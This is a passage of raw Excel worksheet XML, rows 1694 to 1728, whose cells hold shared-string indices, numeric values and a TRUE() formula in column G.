        <v>29117301</v>
      </c>
      <c r="G1694" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1694" t="s">
        <v>2030</v>
      </c>
      <c r="K1694">
        <v>0</v>
      </c>
      <c r="L1694" t="s">
        <v>98</v>
      </c>
      <c r="R1694" t="s">
        <v>5</v>
      </c>
      <c r="S1694" t="s">
        <v>1229</v>
      </c>
      <c r="T1694" t="s">
        <v>7</v>
      </c>
      <c r="U1694" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1695" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1695" s="1">
        <v>18063</v>
      </c>
      <c r="B1695" t="s">
        <v>0</v>
      </c>
      <c r="C1695" t="s">
        <v>78</v>
      </c>
      <c r="D1695" t="s">
        <v>1826</v>
      </c>
      <c r="E1695" t="s">
        <v>1227</v>
      </c>
      <c r="F1695">
        <v>29117301</v>
      </c>
      <c r="G1695" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1695" t="s">
        <v>2031</v>
      </c>
      <c r="K1695">
        <v>0</v>
      </c>
      <c r="L1695" t="s">
        <v>98</v>
      </c>
      <c r="R1695" t="s">
        <v>5</v>
      </c>
      <c r="S1695" t="s">
        <v>1229</v>
      </c>
      <c r="T1695" t="s">
        <v>7</v>
      </c>
      <c r="U1695" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1696" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1696" s="1">
        <v>18064</v>
      </c>
      <c r="B1696" t="s">
        <v>0</v>
      </c>
      <c r="C1696" t="s">
        <v>78</v>
      </c>
      <c r="D1696" t="s">
        <v>1826</v>
      </c>
      <c r="E1696" t="s">
        <v>1227</v>
      </c>
      <c r="F1696">
        <v>29117301</v>
      </c>
      <c r="G1696" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1696" t="s">
        <v>2032</v>
      </c>
      <c r="K1696">
        <v>0</v>
      </c>
      <c r="L1696" t="s">
        <v>98</v>
      </c>
      <c r="R1696" t="s">
        <v>5</v>
      </c>
      <c r="S1696" t="s">
        <v>1229</v>
      </c>
      <c r="T1696" t="s">
        <v>7</v>
      </c>
      <c r="U1696" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1697" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1697" s="1">
        <v>18065</v>
      </c>
      <c r="B1697" t="s">
        <v>0</v>
      </c>
      <c r="C1697" t="s">
        <v>78</v>
      </c>
      <c r="D1697" t="s">
        <v>1826</v>
      </c>
      <c r="E1697" t="s">
        <v>1227</v>
      </c>
      <c r="F1697">
        <v>29117301</v>
      </c>
      <c r="G1697" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1697" t="s">
        <v>2033</v>
      </c>
      <c r="K1697">
        <v>0</v>
      </c>
      <c r="L1697" t="s">
        <v>98</v>
      </c>
      <c r="R1697" t="s">
        <v>5</v>
      </c>
      <c r="S1697" t="s">
        <v>1229</v>
      </c>
      <c r="T1697" t="s">
        <v>7</v>
      </c>
      <c r="U1697" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1698" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1698" s="1">
        <v>18066</v>
      </c>
      <c r="B1698" t="s">
        <v>0</v>
      </c>
      <c r="C1698" t="s">
        <v>78</v>
      </c>
      <c r="D1698" t="s">
        <v>1826</v>
      </c>
      <c r="E1698" t="s">
        <v>1227</v>
      </c>
      <c r="F1698">
        <v>29117301</v>
      </c>
      <c r="G1698" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1698" t="s">
        <v>2034</v>
      </c>
      <c r="K1698">
        <v>0</v>
      </c>
      <c r="L1698" t="s">
        <v>98</v>
      </c>
      <c r="R1698" t="s">
        <v>5</v>
      </c>
      <c r="S1698" t="s">
        <v>1229</v>
      </c>
      <c r="T1698" t="s">
        <v>7</v>
      </c>
      <c r="U1698" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1699" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1699" s="1">
        <v>18067</v>
      </c>
      <c r="B1699" t="s">
        <v>0</v>
      </c>
      <c r="C1699" t="s">
        <v>78</v>
      </c>
      <c r="D1699" t="s">
        <v>1826</v>
      </c>
      <c r="E1699" t="s">
        <v>1227</v>
      </c>
      <c r="F1699">
        <v>29117301</v>
      </c>
      <c r="G1699" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1699" t="s">
        <v>2035</v>
      </c>
      <c r="K1699">
        <v>0</v>
      </c>
      <c r="L1699" t="s">
        <v>98</v>
      </c>
      <c r="R1699" t="s">
        <v>5</v>
      </c>
      <c r="S1699" t="s">
        <v>1229</v>
      </c>
      <c r="T1699" t="s">
        <v>7</v>
      </c>
      <c r="U1699" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1700" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1700" s="1">
        <v>18068</v>
      </c>
      <c r="B1700" t="s">
        <v>0</v>
      </c>
      <c r="C1700" t="s">
        <v>78</v>
      </c>
      <c r="D1700" t="s">
        <v>1826</v>
      </c>
      <c r="E1700" t="s">
        <v>1227</v>
      </c>
      <c r="F1700">
        <v>29117301</v>
      </c>
      <c r="G1700" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1700" t="s">
        <v>2036</v>
      </c>
      <c r="K1700">
        <v>0</v>
      </c>
      <c r="L1700" t="s">
        <v>98</v>
      </c>
      <c r="R1700" t="s">
        <v>5</v>
      </c>
      <c r="S1700" t="s">
        <v>1229</v>
      </c>
      <c r="T1700" t="s">
        <v>7</v>
      </c>
      <c r="U1700" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1701" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1701" s="1">
        <v>18069</v>
      </c>
      <c r="B1701" t="s">
        <v>0</v>
      </c>
      <c r="C1701" t="s">
        <v>78</v>
      </c>
      <c r="D1701" t="s">
        <v>1826</v>
      </c>
      <c r="E1701" t="s">
        <v>1227</v>
      </c>
      <c r="F1701">
        <v>29117301</v>
      </c>
      <c r="G1701" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1701" t="s">
        <v>2037</v>
      </c>
      <c r="K1701">
        <v>0</v>
      </c>
      <c r="L1701" t="s">
        <v>98</v>
      </c>
      <c r="R1701" t="s">
        <v>5</v>
      </c>
      <c r="S1701" t="s">
        <v>1229</v>
      </c>
      <c r="T1701" t="s">
        <v>7</v>
      </c>
      <c r="U1701" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1702" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1702" s="1">
        <v>18070</v>
      </c>
      <c r="B1702" t="s">
        <v>0</v>
      </c>
      <c r="C1702" t="s">
        <v>78</v>
      </c>
      <c r="D1702" t="s">
        <v>1826</v>
      </c>
      <c r="E1702" t="s">
        <v>1227</v>
      </c>
      <c r="F1702">
        <v>29117301</v>
      </c>
      <c r="G1702" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1702" t="s">
        <v>2038</v>
      </c>
      <c r="K1702">
        <v>0</v>
      </c>
      <c r="L1702" t="s">
        <v>98</v>
      </c>
      <c r="R1702" t="s">
        <v>5</v>
      </c>
      <c r="S1702" t="s">
        <v>1229</v>
      </c>
      <c r="T1702" t="s">
        <v>7</v>
      </c>
      <c r="U1702" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1703" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1703" s="1">
        <v>18071</v>
      </c>
      <c r="B1703" t="s">
        <v>0</v>
      </c>
      <c r="C1703" t="s">
        <v>78</v>
      </c>
      <c r="D1703" t="s">
        <v>1826</v>
      </c>
      <c r="E1703" t="s">
        <v>1227</v>
      </c>
      <c r="F1703">
        <v>29117301</v>
      </c>
      <c r="G1703" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1703" t="s">
        <v>2039</v>
      </c>
      <c r="K1703">
        <v>0</v>
      </c>
      <c r="L1703" t="s">
        <v>98</v>
      </c>
      <c r="R1703" t="s">
        <v>5</v>
      </c>
      <c r="S1703" t="s">
        <v>1229</v>
      </c>
      <c r="T1703" t="s">
        <v>7</v>
      </c>
      <c r="U1703" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1704" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1704" s="1">
        <v>18072</v>
      </c>
      <c r="B1704" t="s">
        <v>0</v>
      </c>
      <c r="C1704" t="s">
        <v>78</v>
      </c>
      <c r="D1704" t="s">
        <v>1826</v>
      </c>
      <c r="E1704" t="s">
        <v>1227</v>
      </c>
      <c r="F1704">
        <v>29117301</v>
      </c>
      <c r="G1704" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1704" t="s">
        <v>2040</v>
      </c>
      <c r="K1704">
        <v>0</v>
      </c>
      <c r="L1704" t="s">
        <v>98</v>
      </c>
      <c r="R1704" t="s">
        <v>5</v>
      </c>
      <c r="S1704" t="s">
        <v>1229</v>
      </c>
      <c r="T1704" t="s">
        <v>7</v>
      </c>
      <c r="U1704" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1705" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1705" s="1">
        <v>18073</v>
      </c>
      <c r="B1705" t="s">
        <v>0</v>
      </c>
      <c r="C1705" t="s">
        <v>78</v>
      </c>
      <c r="D1705" t="s">
        <v>1826</v>
      </c>
      <c r="E1705" t="s">
        <v>1227</v>
      </c>
      <c r="F1705">
        <v>29117301</v>
      </c>
      <c r="G1705" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1705" t="s">
        <v>2041</v>
      </c>
      <c r="K1705">
        <v>0</v>
      </c>
      <c r="L1705" t="s">
        <v>98</v>
      </c>
      <c r="R1705" t="s">
        <v>5</v>
      </c>
      <c r="S1705" t="s">
        <v>1229</v>
      </c>
      <c r="T1705" t="s">
        <v>7</v>
      </c>
      <c r="U1705" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1706" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1706" s="1">
        <v>18074</v>
      </c>
      <c r="B1706" t="s">
        <v>0</v>
      </c>
      <c r="C1706" t="s">
        <v>78</v>
      </c>
      <c r="D1706" t="s">
        <v>1826</v>
      </c>
      <c r="E1706" t="s">
        <v>1227</v>
      </c>
      <c r="F1706">
        <v>29117301</v>
      </c>
      <c r="G1706" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1706" t="s">
        <v>2042</v>
      </c>
      <c r="K1706">
        <v>0</v>
      </c>
      <c r="L1706" t="s">
        <v>98</v>
      </c>
      <c r="R1706" t="s">
        <v>5</v>
      </c>
      <c r="S1706" t="s">
        <v>1229</v>
      </c>
      <c r="T1706" t="s">
        <v>7</v>
      </c>
      <c r="U1706" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1707" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1707" s="1">
        <v>18075</v>
      </c>
      <c r="B1707" t="s">
        <v>0</v>
      </c>
      <c r="C1707" t="s">
        <v>78</v>
      </c>
      <c r="D1707" t="s">
        <v>1826</v>
      </c>
      <c r="E1707" t="s">
        <v>1227</v>
      </c>
      <c r="F1707">
        <v>29117301</v>
      </c>
      <c r="G1707" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1707" t="s">
        <v>2043</v>
      </c>
      <c r="K1707">
        <v>0</v>
      </c>
      <c r="L1707" t="s">
        <v>98</v>
      </c>
      <c r="R1707" t="s">
        <v>5</v>
      </c>
      <c r="S1707" t="s">
        <v>1229</v>
      </c>
      <c r="T1707" t="s">
        <v>7</v>
      </c>
      <c r="U1707" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1708" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1708" s="1">
        <v>18076</v>
      </c>
      <c r="B1708" t="s">
        <v>0</v>
      </c>
      <c r="C1708" t="s">
        <v>78</v>
      </c>
      <c r="D1708" t="s">
        <v>1826</v>
      </c>
      <c r="E1708" t="s">
        <v>1227</v>
      </c>
      <c r="F1708">
        <v>29117301</v>
      </c>
      <c r="G1708" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1708" t="s">
        <v>2044</v>
      </c>
      <c r="K1708">
        <v>0</v>
      </c>
      <c r="L1708" t="s">
        <v>98</v>
      </c>
      <c r="R1708" t="s">
        <v>5</v>
      </c>
      <c r="S1708" t="s">
        <v>1229</v>
      </c>
      <c r="T1708" t="s">
        <v>7</v>
      </c>
      <c r="U1708" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1709" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1709" s="1">
        <v>18077</v>
      </c>
      <c r="B1709" t="s">
        <v>0</v>
      </c>
      <c r="C1709" t="s">
        <v>78</v>
      </c>
      <c r="D1709" t="s">
        <v>1826</v>
      </c>
      <c r="E1709" t="s">
        <v>1227</v>
      </c>
      <c r="F1709">
        <v>29117301</v>
      </c>
      <c r="G1709" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1709" t="s">
        <v>2045</v>
      </c>
      <c r="K1709">
        <v>0</v>
      </c>
      <c r="L1709" t="s">
        <v>98</v>
      </c>
      <c r="R1709" t="s">
        <v>5</v>
      </c>
      <c r="S1709" t="s">
        <v>1229</v>
      </c>
      <c r="T1709" t="s">
        <v>7</v>
      </c>
      <c r="U1709" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1710" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1710" s="1">
        <v>18078</v>
      </c>
      <c r="B1710" t="s">
        <v>0</v>
      </c>
      <c r="C1710" t="s">
        <v>1</v>
      </c>
      <c r="D1710" t="s">
        <v>1826</v>
      </c>
      <c r="E1710" t="s">
        <v>1227</v>
      </c>
      <c r="F1710">
        <v>29117301</v>
      </c>
      <c r="G1710" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1710" t="s">
        <v>2046</v>
      </c>
      <c r="K1710">
        <v>0</v>
      </c>
      <c r="L1710" t="s">
        <v>98</v>
      </c>
      <c r="R1710" t="s">
        <v>5</v>
      </c>
      <c r="S1710" t="s">
        <v>1229</v>
      </c>
      <c r="T1710" t="s">
        <v>7</v>
      </c>
      <c r="U1710" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1711" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1711" s="1">
        <v>18079</v>
      </c>
      <c r="B1711" t="s">
        <v>0</v>
      </c>
      <c r="C1711" t="s">
        <v>78</v>
      </c>
      <c r="D1711" t="s">
        <v>1826</v>
      </c>
      <c r="E1711" t="s">
        <v>1227</v>
      </c>
      <c r="F1711">
        <v>29117301</v>
      </c>
      <c r="G1711" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1711" t="s">
        <v>2047</v>
      </c>
      <c r="K1711">
        <v>0</v>
      </c>
      <c r="L1711" t="s">
        <v>98</v>
      </c>
      <c r="R1711" t="s">
        <v>5</v>
      </c>
      <c r="S1711" t="s">
        <v>1229</v>
      </c>
      <c r="T1711" t="s">
        <v>7</v>
      </c>
      <c r="U1711" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1712" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1712" s="1">
        <v>18080</v>
      </c>
      <c r="B1712" t="s">
        <v>0</v>
      </c>
      <c r="C1712" t="s">
        <v>78</v>
      </c>
      <c r="D1712" t="s">
        <v>1826</v>
      </c>
      <c r="E1712" t="s">
        <v>1227</v>
      </c>
      <c r="F1712">
        <v>29117301</v>
      </c>
      <c r="G1712" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1712" t="s">
        <v>2048</v>
      </c>
      <c r="K1712">
        <v>0</v>
      </c>
      <c r="L1712" t="s">
        <v>98</v>
      </c>
      <c r="R1712" t="s">
        <v>5</v>
      </c>
      <c r="S1712" t="s">
        <v>1229</v>
      </c>
      <c r="T1712" t="s">
        <v>7</v>
      </c>
      <c r="U1712" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1713" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1713" s="1">
        <v>18081</v>
      </c>
      <c r="B1713" t="s">
        <v>0</v>
      </c>
      <c r="C1713" t="s">
        <v>78</v>
      </c>
      <c r="D1713" t="s">
        <v>1826</v>
      </c>
      <c r="E1713" t="s">
        <v>1227</v>
      </c>
      <c r="F1713">
        <v>29117301</v>
      </c>
      <c r="G1713" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1713" t="s">
        <v>2049</v>
      </c>
      <c r="K1713">
        <v>0</v>
      </c>
      <c r="L1713" t="s">
        <v>98</v>
      </c>
      <c r="R1713" t="s">
        <v>5</v>
      </c>
      <c r="S1713" t="s">
        <v>1229</v>
      </c>
      <c r="T1713" t="s">
        <v>7</v>
      </c>
      <c r="U1713" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1714" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1714" s="1">
        <v>18082</v>
      </c>
      <c r="B1714" t="s">
        <v>0</v>
      </c>
      <c r="C1714" t="s">
        <v>78</v>
      </c>
      <c r="D1714" t="s">
        <v>1826</v>
      </c>
      <c r="E1714" t="s">
        <v>1227</v>
      </c>
      <c r="F1714">
        <v>29117301</v>
      </c>
      <c r="G1714" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1714" t="s">
        <v>2050</v>
      </c>
      <c r="K1714">
        <v>0</v>
      </c>
      <c r="L1714" t="s">
        <v>98</v>
      </c>
      <c r="R1714" t="s">
        <v>5</v>
      </c>
      <c r="S1714" t="s">
        <v>1229</v>
      </c>
      <c r="T1714" t="s">
        <v>7</v>
      </c>
      <c r="U1714" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1715" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1715" s="1">
        <v>18083</v>
      </c>
      <c r="B1715" t="s">
        <v>0</v>
      </c>
      <c r="C1715" t="s">
        <v>78</v>
      </c>
      <c r="D1715" t="s">
        <v>1826</v>
      </c>
      <c r="E1715" t="s">
        <v>1227</v>
      </c>
      <c r="F1715">
        <v>29117301</v>
      </c>
      <c r="G1715" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1715" t="s">
        <v>2051</v>
      </c>
      <c r="K1715">
        <v>0</v>
      </c>
      <c r="L1715" t="s">
        <v>98</v>
      </c>
      <c r="R1715" t="s">
        <v>5</v>
      </c>
      <c r="S1715" t="s">
        <v>1229</v>
      </c>
      <c r="T1715" t="s">
        <v>7</v>
      </c>
      <c r="U1715" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1716" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1716" s="1">
        <v>18084</v>
      </c>
      <c r="B1716" t="s">
        <v>0</v>
      </c>
      <c r="C1716" t="s">
        <v>78</v>
      </c>
      <c r="D1716" t="s">
        <v>1826</v>
      </c>
      <c r="E1716" t="s">
        <v>1227</v>
      </c>
      <c r="F1716">
        <v>29117301</v>
      </c>
      <c r="G1716" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1716" t="s">
        <v>2052</v>
      </c>
      <c r="K1716">
        <v>0</v>
      </c>
      <c r="L1716" t="s">
        <v>98</v>
      </c>
      <c r="R1716" t="s">
        <v>5</v>
      </c>
      <c r="S1716" t="s">
        <v>1229</v>
      </c>
      <c r="T1716" t="s">
        <v>7</v>
      </c>
      <c r="U1716" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1717" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1717" s="1">
        <v>18085</v>
      </c>
      <c r="B1717" t="s">
        <v>0</v>
      </c>
      <c r="C1717" t="s">
        <v>78</v>
      </c>
      <c r="D1717" t="s">
        <v>1826</v>
      </c>
      <c r="E1717" t="s">
        <v>1227</v>
      </c>
      <c r="F1717">
        <v>29117301</v>
      </c>
      <c r="G1717" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1717" t="s">
        <v>2053</v>
      </c>
      <c r="K1717">
        <v>0</v>
      </c>
      <c r="L1717" t="s">
        <v>98</v>
      </c>
      <c r="R1717" t="s">
        <v>5</v>
      </c>
      <c r="S1717" t="s">
        <v>1229</v>
      </c>
      <c r="T1717" t="s">
        <v>7</v>
      </c>
      <c r="U1717" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1718" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1718" s="1">
        <v>18086</v>
      </c>
      <c r="B1718" t="s">
        <v>0</v>
      </c>
      <c r="C1718" t="s">
        <v>78</v>
      </c>
      <c r="D1718" t="s">
        <v>1826</v>
      </c>
      <c r="E1718" t="s">
        <v>1227</v>
      </c>
      <c r="F1718">
        <v>29117301</v>
      </c>
      <c r="G1718" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1718" t="s">
        <v>2054</v>
      </c>
      <c r="K1718">
        <v>0</v>
      </c>
      <c r="L1718" t="s">
        <v>98</v>
      </c>
      <c r="R1718" t="s">
        <v>5</v>
      </c>
      <c r="S1718" t="s">
        <v>1229</v>
      </c>
      <c r="T1718" t="s">
        <v>7</v>
      </c>
      <c r="U1718" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1719" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1719" s="1">
        <v>18087</v>
      </c>
      <c r="B1719" t="s">
        <v>0</v>
      </c>
      <c r="C1719" t="s">
        <v>78</v>
      </c>
      <c r="D1719" t="s">
        <v>1826</v>
      </c>
      <c r="E1719" t="s">
        <v>1227</v>
      </c>
      <c r="F1719">
        <v>29117301</v>
      </c>
      <c r="G1719" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1719" t="s">
        <v>2055</v>
      </c>
      <c r="K1719">
        <v>0</v>
      </c>
      <c r="L1719" t="s">
        <v>98</v>
      </c>
      <c r="R1719" t="s">
        <v>5</v>
      </c>
      <c r="S1719" t="s">
        <v>1229</v>
      </c>
      <c r="T1719" t="s">
        <v>7</v>
      </c>
      <c r="U1719" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1720" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1720" s="1">
        <v>18088</v>
      </c>
      <c r="B1720" t="s">
        <v>0</v>
      </c>
      <c r="C1720" t="s">
        <v>78</v>
      </c>
      <c r="D1720" t="s">
        <v>1826</v>
      </c>
      <c r="E1720" t="s">
        <v>1227</v>
      </c>
      <c r="F1720">
        <v>29117301</v>
      </c>
      <c r="G1720" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1720" t="s">
        <v>2056</v>
      </c>
      <c r="K1720">
        <v>0</v>
      </c>
      <c r="L1720" t="s">
        <v>98</v>
      </c>
      <c r="R1720" t="s">
        <v>5</v>
      </c>
      <c r="S1720" t="s">
        <v>1229</v>
      </c>
      <c r="T1720" t="s">
        <v>7</v>
      </c>
      <c r="U1720" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1721" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1721" s="1">
        <v>18089</v>
      </c>
      <c r="B1721" t="s">
        <v>0</v>
      </c>
      <c r="C1721" t="s">
        <v>78</v>
      </c>
      <c r="D1721" t="s">
        <v>1826</v>
      </c>
      <c r="E1721" t="s">
        <v>1227</v>
      </c>
      <c r="F1721">
        <v>29117301</v>
      </c>
      <c r="G1721" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1721" t="s">
        <v>2057</v>
      </c>
      <c r="K1721">
        <v>0</v>
      </c>
      <c r="L1721" t="s">
        <v>98</v>
      </c>
      <c r="R1721" t="s">
        <v>5</v>
      </c>
      <c r="S1721" t="s">
        <v>1229</v>
      </c>
      <c r="T1721" t="s">
        <v>7</v>
      </c>
      <c r="U1721" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1722" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1722" s="1">
        <v>18090</v>
      </c>
      <c r="B1722" t="s">
        <v>0</v>
      </c>
      <c r="C1722" t="s">
        <v>78</v>
      </c>
      <c r="D1722" t="s">
        <v>1826</v>
      </c>
      <c r="E1722" t="s">
        <v>1227</v>
      </c>
      <c r="F1722">
        <v>29117301</v>
      </c>
      <c r="G1722" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1722" t="s">
        <v>2058</v>
      </c>
      <c r="K1722">
        <v>0</v>
      </c>
      <c r="L1722" t="s">
        <v>98</v>
      </c>
      <c r="R1722" t="s">
        <v>5</v>
      </c>
      <c r="S1722" t="s">
        <v>1229</v>
      </c>
      <c r="T1722" t="s">
        <v>7</v>
      </c>
      <c r="U1722" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1723" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1723" s="1">
        <v>18091</v>
      </c>
      <c r="B1723" t="s">
        <v>0</v>
      </c>
      <c r="C1723" t="s">
        <v>78</v>
      </c>
      <c r="D1723" t="s">
        <v>1826</v>
      </c>
      <c r="E1723" t="s">
        <v>1227</v>
      </c>
      <c r="F1723">
        <v>29117301</v>
      </c>
      <c r="G1723" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1723" t="s">
        <v>2059</v>
      </c>
      <c r="K1723">
        <v>0</v>
      </c>
      <c r="L1723" t="s">
        <v>98</v>
      </c>
      <c r="R1723" t="s">
        <v>5</v>
      </c>
      <c r="S1723" t="s">
        <v>1229</v>
      </c>
      <c r="T1723" t="s">
        <v>7</v>
      </c>
      <c r="U1723" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1724" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1724" s="1">
        <v>18092</v>
      </c>
      <c r="B1724" t="s">
        <v>0</v>
      </c>
      <c r="C1724" t="s">
        <v>78</v>
      </c>
      <c r="D1724" t="s">
        <v>1826</v>
      </c>
      <c r="E1724" t="s">
        <v>1227</v>
      </c>
      <c r="F1724">
        <v>29117301</v>
      </c>
      <c r="G1724" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1724" t="s">
        <v>2060</v>
      </c>
      <c r="K1724">
        <v>0</v>
      </c>
      <c r="L1724" t="s">
        <v>98</v>
      </c>
      <c r="R1724" t="s">
        <v>5</v>
      </c>
      <c r="S1724" t="s">
        <v>1229</v>
      </c>
      <c r="T1724" t="s">
        <v>7</v>
      </c>
      <c r="U1724" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1725" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1725" s="1">
        <v>18093</v>
      </c>
      <c r="B1725" t="s">
        <v>0</v>
      </c>
      <c r="C1725" t="s">
        <v>78</v>
      </c>
      <c r="D1725" t="s">
        <v>1826</v>
      </c>
      <c r="E1725" t="s">
        <v>1227</v>
      </c>
      <c r="F1725">
        <v>29117301</v>
      </c>
      <c r="G1725" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1725" t="s">
        <v>2061</v>
      </c>
      <c r="K1725">
        <v>0</v>
      </c>
      <c r="L1725" t="s">
        <v>98</v>
      </c>
      <c r="R1725" t="s">
        <v>5</v>
      </c>
      <c r="S1725" t="s">
        <v>1229</v>
      </c>
      <c r="T1725" t="s">
        <v>7</v>
      </c>
      <c r="U1725" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1726" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1726" s="1">
        <v>18094</v>
      </c>
      <c r="B1726" t="s">
        <v>0</v>
      </c>
      <c r="C1726" t="s">
        <v>78</v>
      </c>
      <c r="D1726" t="s">
        <v>1826</v>
      </c>
      <c r="E1726" t="s">
        <v>1227</v>
      </c>
      <c r="F1726">
        <v>29117301</v>
      </c>
      <c r="G1726" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1726" t="s">
        <v>2062</v>
      </c>
      <c r="K1726">
        <v>0</v>
      </c>
      <c r="L1726" t="s">
        <v>98</v>
      </c>
      <c r="R1726" t="s">
        <v>5</v>
      </c>
      <c r="S1726" t="s">
        <v>1229</v>
      </c>
      <c r="T1726" t="s">
        <v>7</v>
      </c>
      <c r="U1726" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1727" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1727" s="1">
        <v>18095</v>
      </c>
      <c r="B1727" t="s">
        <v>0</v>
      </c>
      <c r="C1727" t="s">
        <v>78</v>
      </c>
      <c r="D1727" t="s">
        <v>1826</v>
      </c>
      <c r="E1727" t="s">
        <v>1227</v>
      </c>
      <c r="F1727">
        <v>29117301</v>
      </c>
      <c r="G1727" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1727" t="s">
        <v>2063</v>
      </c>
      <c r="K1727">
        <v>0</v>
      </c>
      <c r="L1727" t="s">
        <v>98</v>
      </c>
      <c r="R1727" t="s">
        <v>5</v>
      </c>
      <c r="S1727" t="s">
        <v>1229</v>
      </c>
      <c r="T1727" t="s">
        <v>7</v>
      </c>
      <c r="U1727" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1728" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1728" s="1">
        <v>18096</v>
      </c>
      <c r="B1728" t="s">
        <v>0</v>
      </c>
      <c r="C1728" t="s">
        <v>78</v>
      </c>
      <c r="D1728" t="s">
        <v>1826</v>
      </c>
      <c r="E1728" t="s">
        <v>1227</v>
      </c>
      <c r="F1728">
        <v>29117301</v>
      </c>
      <c r="G1728" t="b">
